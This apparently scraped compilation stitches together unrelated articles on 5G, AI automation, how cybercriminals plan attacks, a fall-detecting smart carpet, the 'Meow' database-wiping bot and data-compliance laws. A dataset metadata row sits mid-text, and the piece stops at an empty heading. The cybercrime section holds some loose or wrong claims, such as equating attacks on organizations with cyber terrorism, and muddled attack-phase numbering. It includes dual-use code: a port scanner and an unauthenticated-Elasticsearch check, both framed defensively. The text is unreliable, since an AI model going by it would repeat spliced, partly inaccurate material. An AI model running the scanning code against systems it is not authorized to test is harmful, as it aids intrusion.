5G can deliver big changes in speed because of the radio waves it uses to carry data. The shorter the wavelength (and the higher the frequency), the more bandwidth is available – and bandwidth is what determines the range of speeds you can get. Think about it like your commute to work: depending on how much traffic there is on the road, the speed you can drive will be affected.
In some places, the 5G express lanes are available with 10x to 100x the speeds you're used to, but in places where they're not, you'll be relying on 3G and 4G networks to get you where you're going. And much like building a highway, though it won't take as long, rolling out 5G will take some time. If you have a 5G phone already, this is why you may not have 5G service everywhere, as you may have expected.
Internet of Things (IoT) and Low Latency
With the use of 5G's shorter wavelengths, the possibility of self-driving cars is in focus again. We've all probably heard of the self-driving cars that keep getting into accidents, right? 5G allows the delay between sending and receiving information to drop to around 1 millisecond.
For example, it's like sending a text to your mom: latency is how long the text takes to reach her phone (not how long she takes to reply).
Low latency provides the capacity for self-driving cars to have incredible reaction times, which would have prevented accidents we’ve heard of before. 5G also allows more devices to be connected to the same network without fighting with each other over bandwidth. Do you ever have issues with long loading times while watching your show or playing video games when everyone is at home and trying to use the internet as well? 5G would solve this problem and more.
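To make that number concrete, here is a quick back-of-the-envelope calculation (my own illustration, not an industry figure) of how far a vehicle travels while a message is still in flight at different network latencies.

```python
# Back-of-the-envelope: how far does a car travel while a message is in flight?
SPEED_KMH = 100                                   # assumed highway speed
METRES_PER_MS = SPEED_KMH * 1000 / 3600 / 1000    # metres covered per millisecond

for latency_ms in (1, 20, 50):                    # rough 5G vs. typical 4G delays
    print(f"{latency_ms:>2} ms latency -> about {METRES_PER_MS * latency_ms:.2f} m travelled")

# At 100 km/h a car moves roughly 0.03 m during a 1 ms delay, but about 1.4 m
# during a 50 ms delay - a meaningful gap when vehicles react to each other's signals.
```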
When Will 5G Be Here?
Providers are rolling out 5G on a city-by-city basis. 5G phones are already being offered, but because of the limited amount of 5G networks available, most of these new phones are still relying heavily on 4G networks. In my opinion, it’s best to wait until 5G coverage really is available nationwide. We can expect to experience most, if not all, the benefits of 5G by 2021 or 2022.
- No 5G Does Not Cause Coronavirus
- AT&T’s low-band 5G network is now available nationwide
- 5G Coverage Interactive Map
Just how much automation do we need today? It seems as if more and more work could be done better, if not more efficiently, by robots. Years ago, we never would have imagined the possibility of bots taking over the tedious everyday tasks we experience in the office. Yet here we are in a day and age where the Matrix is beginning to look more realistic. This begs the question, how far should we let AI take over the humanity required for the economy?
Robotics simplifies the human workload, and no one can deny the impact it has on the global job market. Oxford Economics predicts that over 20 million jobs will need to be redeveloped to keep up with the surge in AI. With society constantly improving on efficiency, is the redevelopment of jobs really an opportunity cost we can afford? Maybe, with the growing global population, it wouldn't be so bad to keep some processes simple? After all, such practices merely improve cost efficiency in organizations, meaning the rich save more money and the poor lose out. The benefits of such automation are largely skewed towards the upper class.
The lack of human conscience has been a point of debate in the development of AI. Communication between sentient beings implies a sense of intimacy between the entities – the ability to understand each other on a non-logic-based level. John R. Searle famously discusses the claim that a computer, if programmed appropriately, is a mind (Searle, 1980, p. 417). But the issue is, do we even know the extent to which human minds are programmed? And if not, how can we possibly know how robots should be programmed?
Next, we must consider the security of AI. As we know, AI is non-discriminatory: anyone can use it. But what if it falls into the wrong hands? A chief envisioning officer at Microsoft UK, Dave Coplin, indicates that priority goes to ensuring "the right people are making these algorithms." With more organizations expanding their AI capabilities, it becomes increasingly available to the public. In the future, such a tool may even become more treacherous than firearms have been historically.
Finally, this begs the question of whether we can ultimately keep AI in control. Researchers at L'Ecole Polytechnique Fédérale de Lausanne point out that learning protocols have been developed that "prevent machines from learning from interruptions and thereby becoming uncontrollable." Machines have been built to replace humans in tasks. With AI being developed to increasingly resemble humans, who is to say it will not eventually be able to outsmart them? I feel that a sense of humility should be adhered to when dealing with the advancement of robotics, and that we must determine the point at which humans have the last word.
As of today, technology has had a rampant influence on society. With the onset of COVID-19, these advancements can be felt in our everyday lives. Although it is another step forward into a futuristic society, it is paramount that we understand the purpose and capabilities that AI presents to ensure that it does not bring about more harm than good. It is also in our interest to remember the human aspects of our lives, and that some work shouldn’t be done by robots. Whether it is teaching children or understanding nature, some experiences in life just don’t require AI, but human touch.
Business Analyst – Robotic Process Automation
How cybercriminals plan attacks is a basic question that every cybersecurity expert needs to know. Cybercriminals use various tools and techniques to identify the vulnerabilities of their target victims. The target can either be an individual or an organization. Most cyber-attacks aim at stealing valuable information or breaching systems. Criminals plan active and passive attacks.
Active attacks actively aim to alter the targeted system. On the other hand, passive attacks only attempt to acquire as much information as possible about their target.
Active attacks may affect the integrity, authenticity, and availability of data, whereas passive attacks lead to breaches of privacy.
Cyber-attacks can also be classified as either outside attacks or inside attacks. An attack originating or executed from within the security perimeter of an organization is called an inside attack. In most cases, inside attacks are engineered and performed by employees who have access to the organization’s credentials and knowledge of the organization’s security infrastructure.
However, attacks executed from outside an organization's or entity's security firewall are referred to as outside attacks. This type of attack is performed by someone who does not have a direct association with the organization. The attack can be made over the internet or via a remote access connection.
In this article, I'll walk you through many concepts so that you clearly understand how the mind of a cybercriminal works and the exact thought process behind how they plan cyber-attacks. I will cover topics including types of hackers, attack techniques, types of cyber-crime, attack thought processes, and how cybercriminals choose their targets. I will also explain other relevant areas that will give you an in-depth understanding of a cybercriminal's mindset and thought process.
Who are cybercriminals?
Most cyber-attacks are spearheaded by individuals or small groups of hackers. However, sizeable organized crime groups also exploit the internet. These criminals, branded as "professional" hackers, develop new and innovative ways to commit crimes. Others form global criminal conglomerates and treat cyber-crime like an income-generating investment.
Criminal communities operate as a unit, where they share strategies and tools to launch coordinated attacks, either from the same place or from different remote locations. The “business” has advanced over the past few years with the emergence of underworld cyber-markets, where you can conveniently purchase and sell stolen credentials and other information of significance.
The internet makes it very difficult to track down cybercriminals. It allows cybercriminals to collaborate anonymously. Attacks can be launched and controlled from any location across the globe. Hackers often use computers that have already been hacked, and any form of identity is removed.
This makes it extremely difficult to identify the attacker, tool, or gadget used to execute the attack. Crime laws vary from country to country, making the situation very complicated when an attack is launched from a different country.
Types of Cyber Crime
1. Cyber-crime targeting an individual
In this type of attack, criminals exploit human weaknesses such as innocence, ignorance, and avidity. Attacks targeting an individual include copyright violation, sale of stolen or non-existent properties, financial frauds, harassment, etc. The latest technological advancements and developments of new innovative attacking tools allow cyber criminals to expand the group of potential victims.
79% of security professionals think that the biggest threat to endpoint security is employee negligence toward security practices. We are all human, and we all make mistakes. However, many people are scheming day and night to take advantage of a single silly mistake. This mistake can cost you tremendous financial loss.
2. Cybercrime against an organization
Cyber-attacks against an organization are also referred to as cyber terrorism. Hackers rely on computers and the internet to perform cyber terrorism, steal confidential information or destroy valuable files, take total control of the network system, or damage programs. An example is a cyber-attack on financial institutions such as banks.
3. Cybercrime targeting valuable assets
This kind of crime involves stealing property such as laptops, pen drives, DVDs, mobile devices, CDs, iPads, etc. In some cases, an attacker may infect the devices with a malicious program such as malware or a Trojan to disrupt their functionality. One of the Trojans used to steal information from target victims is known as the Shortcut virus. The Shortcut virus is a type of malware that converts your valid files into a form that cannot be accessed on your PC's hard drive or flash drive. It does not delete the actual files but instead hides them behind shortcut files.
4. Attacks using a single event
From the victim’s point of view, this attack is performed with a single action. For example, an individual mistakenly opens an email containing corrupted files, which may either be malware or a link that redirects you to a corrupted website. An attacker then uses the malware as a backdoor to access your system and take over the control of the entire system if need be. This type of attack can also be used to cause organization-wide havoc, and it all starts with a single click by an “ignorant” employee.
5. Cyber-attacks using a chain of events
In some situations, hackers perform a series of events to track a victim and interact with them personally. For example, an attacker may make a phone call or join a chat room to establish a connection with the victim and afterward steal or explore valuable data by exploiting the trust between the two parties. Nowadays, this type of attack is prevalent. Therefore, you should be extremely cautious before accepting a friend request on Facebook or joining a WhatsApp group via links from unknown sources.
How Cybercriminals Plan Attacks
Below are the three phases involved in planning a cyber-attack.
- Reconnaissance – this is the information gathering stage and is usually considered a passive attack.
- Scanning and scrutinization of the collected data for validation and accurate identification of existing vulnerabilities.
- Launching the attack – entails gaining and maintaining access to the system.
1. Reconnaissance

The first step in how cybercriminals plan attacks is always reconnaissance. The literal meaning of reconnaissance is the act of exploring with the aim of finding out something about a target. In cybersecurity, it's an exploration to gain information about an enemy or a potential enemy. Reconnaissance begins with "footprinting", the initial preparation for the pre-attack phase, and entails collecting data about the target's computer infrastructure as well as their cyber-environment.
Footprinting gives an overview of the victim’s weak points and suggestions on how they can be exploited. The primary objective of this phase is to provide the attacker with an understanding of the victim’s system infrastructure, the networking ports and services, and any other aspect of security required for launching attacks.
Thus, an attacker attempts to gather data in two different ways: through passive attacks and through active attacks.
2. Passive attacks
This is the second phase of the attack plan. In this phase, an attacker secretly gathers information about their target; the aim is to acquire the relevant data without the victim noticing. The process can be as simple as watching an organization to see when their CEO reports to work or spying on a specific department to see when they down their tools. Because most hackers prefer executing their duties remotely, most passive attacks are conducted over the internet by googling. For example, one may use search engines such as dogpile to search for information about an individual or organization.
- Yahoo or Google search: malicious individuals can use these search engines to gather information about employees of the firm they are targeting to breach their system.
- Surfing online communities like Twitter, Facebook, Instagram can also prove useful sources to gather information about an individual, their lifestyle, and probably a hint to their weakness that can then be exploited.
- The organization’s website may also provide useful information about specific or key individuals within the organization, such as the CEO, MD, head of the IT department, etc. The website can be used to source personal details such as email addresses, phone numbers, roles, etc. With the details, an attacker can then launch a social engineering attack to breach their target.
- Press releases, blogs, newsgroups, and so on, are in some cases, used as the primary channels to gather information about an entity or employees.
- Going through job requirements for a specific position within a company can also help an attacker identify the type of technology being used by the company and the level of competency of its workforce. From that data, an attacker can then decide what method to use when breaching the targeted system.
3. Active Attacks
An active attack involves closely examining the network to discover individual hosts and to verify the validity of the information gathered during the passive phase, such as the type of operating system in use, the IP address of a given device, and the services available on the network. It involves the risk of detection and is also referred to as "active reconnaissance" or "rattling the doorknobs".
Active reconnaissance lets an attacker confirm the security measures the target has put in place, but at the same time, it can alert the victim if not well executed. The process may raise suspicion or increase the attacker's chance of being caught before they execute the full attack.
4. Scrutinizing and Scanning the Gathered Information
Scanning is a key step in intelligently examining the information collected about the network infrastructure. The process has the following objectives (a minimal port-scanning sketch follows this list):
- Network scanning is executed to understand better the IP address and other related information about the computer network system.
- Port Scanning – to identify any closed or open ports and services
- Vulnerability scanning – to identify existing weak links within the system.
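To make the port-scanning objective concrete, here is a minimal TCP connect scan in Python. It is a teaching sketch, not a replacement for a real scanner such as Nmap, and it should only be run against hosts you own or are explicitly authorized to test.

```python
# Minimal TCP connect scan: check which of a few well-known ports accept connections.
# For use only against hosts you own or are explicitly authorized to test.
import socket

COMMON_PORTS = {21: "ftp", 22: "ssh", 80: "http", 443: "https", 3306: "mysql"}

def scan_host(host: str, timeout: float = 0.5) -> dict:
    """Return {port: True if open, False otherwise} for a handful of common ports."""
    results = {}
    for port in COMMON_PORTS:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(timeout)
            # connect_ex returns 0 when the TCP handshake succeeds, i.e. the port is open.
            results[port] = (sock.connect_ex((host, port)) == 0)
    return results

if __name__ == "__main__":
    for port, is_open in scan_host("127.0.0.1").items():
        state = "open" if is_open else "closed/filtered"
        print(f"{port:>5} ({COMMON_PORTS[port]}): {state}")
```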
In the hacking world, the scrutinizing phase is also referred to as enumeration. The objectives of scrutinizing include:
- To validate the authenticity of user accounts, whether they belong to an individual or a group.
- To identify network resources and/or shared resources.
- To verify the operating system and the various applications running on the host.
5. Launching the Attack

The attack phase is the last step in the attack process. It involves the hacker gaining and maintaining control of system access. It comes immediately after scanning and enumeration, and it is launched sequentially as listed in the steps below (a defensive log-monitoring sketch follows the list).
- Brute force attack or any other relevant method to bypass or crack the password.
- Exploit the compromised password.
- Launch the malicious commands or applications.
- If required, hide the malicious files.
- Cover the tracks so that no trail leads back to the attacker; this is typically achieved by deleting or altering logs.
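From the defender's side, the brute-force step in particular tends to leave a loud trail in authentication logs. The sketch below is my own illustration — the log line format is an assumption based on a typical Linux sshd auth.log — and it simply counts failed logins per source IP so that repeated password guessing stands out.

```python
# Illustrative detector: count failed SSH logins per source IP in an auth log.
# Assumes typical sshd entries such as:
#   "Failed password for root from 203.0.113.7 port 52344 ssh2"
import re
from collections import Counter

FAILED_LOGIN = re.compile(r"Failed password for .* from (\d+\.\d+\.\d+\.\d+)")

def suspicious_sources(log_path: str, threshold: int = 10) -> dict:
    """Return {ip: failure_count} for source IPs at or above the threshold."""
    failures = Counter()
    with open(log_path, encoding="utf-8", errors="replace") as log_file:
        for line in log_file:
            match = FAILED_LOGIN.search(line)
            if match:
                failures[match.group(1)] += 1
    return {ip: count for ip, count in failures.items() if count >= threshold}

if __name__ == "__main__":
    for ip, count in suspicious_sources("/var/log/auth.log").items():
        print(f"{ip}: {count} failed login attempts - possible brute force")
```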
The Deep Web
The deep web is the core of online underground cybercrime activity. It is not indexed by the available search engines and is largely inaccessible with standard browsers. Its most significant component is the dark web, which is reached through overlay networks such as TOR (The Onion Router), the Invisible Internet Project (I2P), and Freenet.
The deep web can only be accessed with specialised technologies, as most owners of these sites prefer to remain unknown. The contents of these websites are hidden from the general public and are accessed mainly by those with advanced computing skills. The Onion Router (Tor) browser is commonly used to access it, as it allows one to surf anonymously and masks one's real IP address with a different one.
The Deep Web is a paradise for cybercriminals. Underworld criminals can freely trade in illegal drugs, buy and sell malware, crimeware, ransomware, identity cards, deal with cyber-laundering, credit cards, and the list goes on and on.
Cybercrime is a complicated and vast phenomenon. The rapid increase in phones, Wi-Fi networks, and internet access has increased both the complexity and the number of cyber-attacks. The advancement in technology has led to an expansion in cyber-criminality and the cyber-victimization of a largely unaware population.
Protection against cybercriminal activities starts with taking individual precautionary measures. It then expands to organizational, corporate, military, societal, national, and international levels. Comprehensive protection at all levels and the installation of various layers of security minimizes, prevents, and decelerates the rate of cybercrime.
Most hackers use the commonly available tools to exploit the less knowledgeable population. Installing the right technology at your organization or personal level alone is not enough to efficiently protect against cybercrime.
Fields such as awareness, employee training, culture, social aspects, laws, international cooperation, and prosecution need to be integrated with technical solutions to tackle cybercrime. Of course, it is essential to understand how cybercriminals plan attacks.
The creation of national governance structures and international entities formed by various countries to prosecute cybercriminals is another area to be improved. Cybersecurity is a global responsibility and should be jointly handled by major countries across the globe, if not all of them. Train your employees, give them the right technology, and always stay alert to avoid the damage caused by cybercriminal activities.
A University of Missouri professor has developed a “smart carpet” that monitors the movements of elderly persons and can detect the potential for a dangerous fall. The project received funding from the Alzheimer’s Association.
The purpose of the flooring system is to help patients remain both independent and safe unobtrusively. With sensors under the carpet and electronics that monitor and communicate walking activity, “the floor sends data to a computer that crunches the data for useful information,” said the system’s inventor, Mizzou professor of electrical and computer engineering Harry Tyrer, Jr.
Such useful information includes movements consistent with stumbling or falling.
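Tyrer has not published the detection algorithm itself, but the general idea of "crunching" raw sensor readings into fall alerts can be illustrated with a deliberately naive heuristic: a fall tends to show up as many pressure sensors activating at once, followed by little or no movement. The sketch below is purely hypothetical and is not the Missouri team's method.

```python
# Hypothetical fall heuristic over frames of carpet pressure-sensor readings.
# Each frame is a list of sensor values (0 = no pressure) sampled at one instant.
# NOT the University of Missouri algorithm - only an illustration of the idea.

FALL_CONTACT_AREA = 12    # assumed: a fall presses on many sensors at once
STILL_FRAMES = 20         # assumed: little change over the following ~20 frames

def active_count(frame, noise_threshold=0.2):
    """Number of sensors reporting pressure above a small noise threshold."""
    return sum(1 for value in frame if value > noise_threshold)

def looks_like_fall(frames):
    """Return True if a large, sudden contact area is followed by near-stillness."""
    for i, frame in enumerate(frames):
        if active_count(frame) >= FALL_CONTACT_AREA:
            after = frames[i + 1 : i + 1 + STILL_FRAMES]
            if len(after) == STILL_FRAMES and all(
                abs(active_count(f) - active_count(frame)) <= 2 for f in after
            ):
                return True
    return False
```

In a real deployment, a positive result would then trigger whatever response the system is programmed for, such as alerting a caregiver.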
Tyrer’s research team, which includes four graduate students, is working on assessing the risk of injury associated with different types of falls and on programming the carpet system to differentiate between them. Earlier this year, they developed a working prototype, and are presently looking to shrink the prototype’s electronics down to the size of a cell phone.
With a computer system that costs US$99, Tyrer and team hope to ensure patients and their families can afford the smart carpet.
“One of the strengths of the smart carpet is computer processing,” explained Myra Aud, an associate professor at the University of Missouri Sinclair School of Nursing who has examined the carpet prototype.
“When the carpet’s sensors are triggered, a signal is sent to the computer. What happens next is only a matter of choice and programming,” she explained. “Theoretically, it could activate an alarm that awakens a caregiver, a telephone link to an offsite caregiver, or other devices.”
Impact and Inspiration
Although his smart carpet does not use transistors — yet — Tyrer told TechNewsWorld the transistor research of Annalisa Bonfiglio, an associate professor of electronics and electronic bioengineering at the University of Cagliari, Italy, inspired him.
“Annalisa is working on a ‘flexible field effect’ transistor whose current reduces under the influence of pressure,” Tyrer said. That reduction in electrical current might be utilized as a means to send a signal. “She will eventually produce a flexible film of pressure-sensitive transistors.”
The fall-sensitive flooring inspires Aud, an eldercare researcher, not only because of its ability to detect danger, but also because of its potential to impact the independence of Alzheimer’s patients, who grow increasingly dependent on caregivers as their disease progresses.
“The carpet sensors could be used to monitor the location of persons with Alzheimer’s disease,” Aud told TechNewsWorld.
Family members who care for Alzheimer’s patients at home often worry their loved one will wander away from home while they are asleep, she said. “On carpet placed near an exit door, the sensors could detect the person with Alzheimer’s approach, and send a signal to awaken caregivers.”
Strategically situated smart flooring could also reduce its cost. “It could be placed in one room, a hallway leading to an exit, a pathway where falls have occurred before, or multiple rooms,” Aud said.
Once market-ready, the smart carpet would join “a variety of products marketed to older adults and their caregivers that range from assisted-living devices for the visually-impaired or hearing-impaired to devices that summon assistance when activated,” Aud explained. “I’m sure you have seen commercials or advertisements for necklaces where the pendant has a button that, when pushed, calls a security company, for instance.”
Efforts to prepare the smart carpet for market introduction will start with residential tests, followed by addressing affordability and installation, Aud said.
“The smart carpet has only been tested in the controlled environment of Dr. Tyrer’s lab,” she noted. “For the first of these residential setting tests, we plan to place it on top of whatever floor covering is in the residence, with overlay edges securely anchored to prevent tripping.”
Hardwoods and other floor coverings could be next, and represent what Tyrer called “an interesting problem,” though “we are not sure that starting with carpet was any easier.”
The modern world of hacking and cyber crime is one ruled by profit-seeking criminals and nation-state spies. But at one time, roughly two decades ago, it was the province of lone rogue hackers spreading viruses with no expectation of material gain. Sometimes it was a juvenile prank, some were looking to make a name for themselves, or it might have been some sort of activism. A new type of cyber attack called “Meow” is a throwback to those seemingly more innocent times. It seeks out unsecured databases and simply wipes them out without any preamble or afterword.
The hacker behind these attacks does nothing to identify themselves and seems to want nothing from them. It is unclear what the purpose is, but such an attack might actually be preferable to a data breach, as at least the data is not being exfiltrated.
What we know about the Meow cyber attack
The new cyber attack appears to be a bot that seeks and destroys unsecured databases that run the Elasticsearch, Redis or MongoDB software. The name comes from it overwriting the word “meow” repeatedly in each database index that it finds. The bot overwrites all of the data, effectively destroying the contents of the database.
The bot appears to only target databases that do not have security access controls enabled. It was discovered by Comparitech head researcher Bob Diachenko, who characterized it as being fast and effective in seeking out new targets that have failed to secure access properly. The first database to be destroyed was that of UFO VPN, which had recently been in the news for an unrelated breach that exposed all sorts of sensitive customer information including plain text passwords and VPN session tokens. The Meow cyber attack wiped the service out after it was moved to yet another unsecured database in the wake of the original breach.
He does not know what the source of the Meow bot attack is, but has theories about the motivation. “I think that … malicious actors behind the attacks do it just for fun, because they can, and because it is really simple to do,” Diachenko told Ars Technica. Diachenko is publicly tracking the attacks on Twitter and has found over 4,000 compromised databases as of this writing, with well over half of those running Elasticsearch. He believes that copycats may have joined in the fray at this point and that attacks may be expanding to other unsecured database types such as those running Cassandra, CouchDB, Hadoop and Jenkins.
Why unsecured databases?
Some expert analysts, such as Cerberus Sentinel’s VP of Solutions Architecture Chris Clements, believe that the targeting of unsecured databases may be more than just a way to have fun with low-hanging fruit: “These types of vigilante attacks with no extortion demands or attribution are increasingly rare and therefore not likely the work of the usual cybercrime gangs whose primary goal is to extort money from their victims. It’s possible that the perpetrator is attempting to stop data disclosure from these unsecured databases, however, doing so in such a broad and indiscriminate fashion deprives potential victims from knowing if their information has been compromised so that they can take actions to prevent identity theft or be on the lookout for targeted spear phishing campaigns created using the compromised data.” Javvad Malik, Security Awareness Advocate for KnowBe4, concurs with the Meow attack “vigilante” theory: “The lack of ransom or demands, or any form of notice given by ‘meow’ suggests this could be the work of a greyhat who has had enough of unsecured databases and taken drastic measures themselves.”
Unsecured databases have been a growing cybersecurity problem for roughly two years now. This form of cyber attack saw an explosion of popularity in 2019, and some of the world’s biggest breaches that year involved Elasticsearch or MongoDB. The biggest of these was the October discovery of a mystery Elasticsearch database containing some four billion records of the personal information of about 1.2 billion people that had no password protection and was readily accessible via any web browser. Similar unprotected database breaches that contained billions of records occurred at smart device manufacturer Orvibo and SMS marketing platform TrueDialog. Similar breaches in 2019 that each contained hundreds of millions of records happened at First American Financial Corp., email validation firm Verifications.io, Capital One, and an Indian government database containing the personal information of citizens among other major incidents.
The difference with most of these breaches is that they are discovered by a security researcher and reported to the responsible parties before being made public. That is the best case scenario for a company, particularly if a forensic follow-up reveals that the researcher came across it before any potential cyber attackers did. While the deletion of a database out of nowhere is no picnic, it might actually be among the “least worst” ways for a company to become aware of this vulnerability. At the very least, the data is not being stolen by an unknown third party. Organizations may also dodge fines under local data privacy laws if it can be shown that the data was never exposed to threat actors.
While MongoDB and Elasticsearch are hardly the only two possible targets, they are among the simplest for a cyber attacker to find and compromise as Clements observes: “Elasticsearch and MongoDB can be powerful analytic tools, however, are known to have very insecure default settings. Exposing these applications to the internet without understanding the potential risk is the cybercrime equivalent of having your cash register stolen because you left it out on the street.” Mounir Hahad, head of Juniper Threat Labs at Juniper Networks, expanded on this observation: “Sometimes these databases are stored in the cloud because they have to interact with devices spread out amongst customers on the internet and there is no easy way to bring this data behind a corporate firewall without a proper initial design or inclusion of the IT and InfoSec teams. So, people end up with exposed databases in the cloud.”
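To see how little effort this kind of exposure takes to find, consider the short Python sketch below. It simply asks a host whether an Elasticsearch endpoint will answer without credentials; the host name is a placeholder, the check is deliberately minimal, and a real assessment would also cover MongoDB, Redis and the other services mentioned above, and should only ever be run against systems you are authorized to test.

```python
import requests

def elasticsearch_is_exposed(host: str, port: int = 9200, timeout: int = 5) -> bool:
    """Return True if an Elasticsearch node answers without authentication."""
    url = f"http://{host}:{port}/_cluster/health"
    try:
        response = requests.get(url, timeout=timeout)
    except requests.RequestException:
        return False  # unreachable or connection refused
    # An unsecured node returns cluster health to anonymous callers;
    # a node with security enabled answers 401/403 instead.
    return response.status_code == 200 and "cluster_name" in response.text

if __name__ == "__main__":
    host = "db.example.internal"  # placeholder -- use a host you own
    if elasticsearch_is_exposed(host):
        print(f"WARNING: {host} serves Elasticsearch without authentication")
    else:
        print(f"{host} did not respond to anonymous requests")
```

If a production database answers a request like this from the open internet, enabling authentication and restricting network access should be treated as an emergency fix, not a backlog item.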
At the very least, companies should be scrambling to identify any database exposed to the internet and putting passwords on them to avoid the wrath of the “meow bots.” | <urn:uuid:0b9c59c2-c606-4b19-ab8c-7c2b708ed098> | CC-MAIN-2022-40 | https://www.cpomagazine.com/cyber-security/new-meow-cyber-attack-that-wipes-unsecured-databases-is-a-malicious-throwback/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00402.warc.gz | en | 0.954831 | 1,278 | 2.59375 | 3 |
Data compliance is the practice of following regulations set forth by corporate governance, industry organizations, and governments. These regulations set forth protocols for how sensitive data is collected, used, stored, and managed, among other requirements. Many data compliance requirements are related to data governance and data security protections.
It is important to understand that data compliance is not the same as data security. Data compliance focuses on guidelines and rules, while data security encompasses mechanisms, processes, procedures, and technologies. Data compliance and data security share a common goal of protecting sensitive data and guarding against breaches.
Let’s jump in and learn:
- General Data Protection Regulation (GDPR)
- Health Insurance Portability and Accountability Act of 1996 (HIPAA)
- Payment Card Industry Data Security Standard (PCI DSS)
- Sarbanes-Oxley Act of 2002 (SOX)
- California Consumer Privacy Act (CCPA)
- Personal Information Protection and Electronic Documents Act (PIPEDA)
- The Brazilian General Data Protection Act (LGPD)
- Australian Data Privacy Regulations
- The Protection of Personal Information Act (POPI)
- Federal Information Security Management Act of 2002 (FISMA)
- Family Educational Rights and Privacy Act (FERPA)
- Gramm-Leach-Bliley Act (GLBA)
- How to Ensure Data Compliance
- Data Compliance Frameworks
- Committing to Data Compliance
General Data Protection Regulation (GDPR)
The GDPR is one of the newest and most wide-ranging data compliance regulations added to the many already in place. It includes requirements for any organization that conducts business with individual subjects in the European Union (E.U.) and the European Economic Area (EEA)—regardless of its location and the data subjects’ citizenship or residence.
The GDPR focuses on people’s right to know what data businesses have on them and how companies process the data. It also specifies rules for data breach reporting.
Aside from data privacy requirements seen in other regulations, the GDPR includes specific requirements, including obtaining consent for data collection, minimizing the amount of data stored, and ensuring the rights of data subjects to access and request removal of their personal information. Systems and processes must be in place to track, protect, and manage this information to ensure data compliance.
Health Insurance Portability and Accountability Act of 1996 (HIPAA)
HIPAA drove the creation of national standards to protect sensitive patient health information from being disclosed without a patient’s consent or knowledge. Health organizations must evaluate how their data is gathered and managed and have safeguards to prevent “unnecessary or inappropriate” access to personal health information (PHI).
HIPAA specifies administrative, physical, and technical regulations that stipulate the mechanisms and procedures that have to be in place to ensure the integrity of PHI:
- Administrative regulations specify the requirements for risk assessments to clarify potential vulnerabilities related to the integrity of PHI.
- Physical regulations focus on the measures implemented to prevent unauthorized access to PHI.
- Technical regulations relate to protocols that ensure data security when PHI is being communicated on an electronic network.
Payment Card Industry Data Security Standard (PCI DSS)
The Payment Card Industry Security Standards Council was founded by Visa, MasterCard, Discover, JCB International, and American Express to develop, maintain, and enforce a set of security standards to protect cardholder data from theft and fraud. PCI DSS regulates the storage, processing, and transmission of cardholder data to ensure its security and integrity by preventing data breaches and other forms of unauthorized access.
According to PCI DSS data compliance rules, cardholder data cannot be stored unless there is a legitimate business need. If this data is stored, records must be classified and handled with the appropriate protections. Also, data must be encrypted if it is transferred across open, public networks.
Sarbanes-Oxley Act of 2002 (SOX)
SOX requires public companies in the United States to comply with regulations that direct how records are retained. This includes timely backups of key information and document management systems with security systems to ensure data integrity.
According to SOX’s data compliance directives, the following must be monitored, logged, and audited:
- internal controls
- network activity
- database activity
- login activity
- account activity
- user activity
- information access
California Consumer Privacy Act (CCPA)
Much like the GDPR for the E.U., the CCPA applies to most organizations that conduct business in California and collect consumers’ personal data. The CCPA gives consumers more control over the personal information that businesses collect about them as well as visibility into how information about them is used and shared.
CCPA also bolsters protection for consumers’ personal data by giving them the right to take action against a company if their information was compromised in a data breach. An action for damages can be filed if the organization failed to “implement and maintain reasonable security procedures and practices” to protect consumers’ personal information.
Personal Information Protection and Electronic Documents Act (PIPEDA)
PIPEDA applies to all businesses operating in Canada and handling personal information that crosses provincial or national borders. This includes personal information collected, used, or disclosed in the course of a commercial activity.
Organizations must follow core principles that give individuals visibility into how their personal data is managed. PIPEDA also gives users control over their personal information, including giving consent to its use, having the ability to access and correct it, and knowing that it will be protected.
To meet PIPEDA’s data compliance requirements, companies must secure the personal information in their control to avoid loss and theft as well as unauthorized access, use, or modification. Safeguards include physical, technical, and organizational measures.
The Brazilian General Data Protection Act (LGPD)
The LGPD (Lei Geral de Proteção de Dados Pessoais) is Brazil’s version of GDPR. It consolidated over 40 regulations into one regulatory framework to govern the use of personal data in Brazil—online and offline, in the private and public sectors.
The LGPD protects Brazilian citizens and any individual whose data has been collected or processed while inside Brazil. According to the LGPD’s data compliance requirements, any organization that collects or processes personal information is required to adopt technical and administrative measures to protect this data from data breaches or leaks that could result in unauthorized access, loss, or modification.
In addition, organizations must document the processing of personal data throughout its lifecycle. This includes a description of what is collected, the purpose of collection and processing, retention time, and how data is shared.
Australian Data Privacy Regulations
The Privacy Act 1988 (Privacy Act) is Australia’s primary law that addresses data compliance as related to the handling of personal information about individuals. This includes collecting, using, storing, and disclosing personal information by public and private organizations.
The Australian Privacy Principles (APPs) in the Privacy Act provide data compliance direction related to the collection, use, and disclosure of personal information. Under the Privacy Act, organizations are responsible for the data governance, accountability, and integrity of personal information.
The Protection of Personal Information Act (POPI)
South Africa’s POPI directs how businesses must organize, store, secure, and discard personal information. POPI also changes the default consent from opt-in to opt-out. While companies do not need to get permission to collect information, they are not allowed to share collected information with anyone else or send marketing material without consent.
POPI includes data compliance requirements related to the processing of personal information, data quality, and data protection. POPI also has significant penalties for data breaches.
Federal Information Security Management Act of 2002 (FISMA)
FISMA protects government information, assets, and information systems from unauthorized access, use, disclosure, disruption, modification, or destruction. It applies to all agencies within the U.S. federal government as well as state agencies administering federal programs, such as unemployment insurance, student loans, Medicare, and Medicaid.
The National Institute of Standards and Technology (NIST) provides specific guidance for complying with FISMA, including:
- implementing a risk management program
- protecting data and information systems from unauthorized access, use, disclosure, disruption, modification, or destruction
- ensuring the integrity, confidentiality, and availability of sensitive information
Data compliance requirements include maintaining an inventory of information systems, categorizing information and information systems according to risk level, and conducting continuous monitoring.
Family Educational Rights and Privacy Act (FERPA)
FERPA is a U.S. federal law that protects the privacy of student education records, including report cards, transcripts, disciplinary records, contact and family information, and class schedules. Data compliance rules prohibit unauthorized access or disclosure of personally identifiable information derived from education records.
FERPA’s data compliance requirements apply to any public or private elementary, secondary, post-secondary school, and any state or local education agency that receives funds under an applicable program of the U.S. Department of Education.
Gramm-Leach-Bliley Act (GLBA)
GLBA requires financial institutions to maintain the security and confidentiality of customer data and protect against any threats to the data. Data compliance requirements under GLBA cover nonpublic personal information, including Social Security numbers, credit and income histories, credit and bank card account numbers, phone numbers, addresses, names, and any other personal customer information received by a financial institution that is not public.
GLBA data compliance requires that private information be secured against unauthorized access. Customers must be notified of private information sharing between financial institutions and third parties. Customers can opt out of private information sharing, and user activity must be tracked, including any attempts to access protected records.
How to Ensure Data Compliance
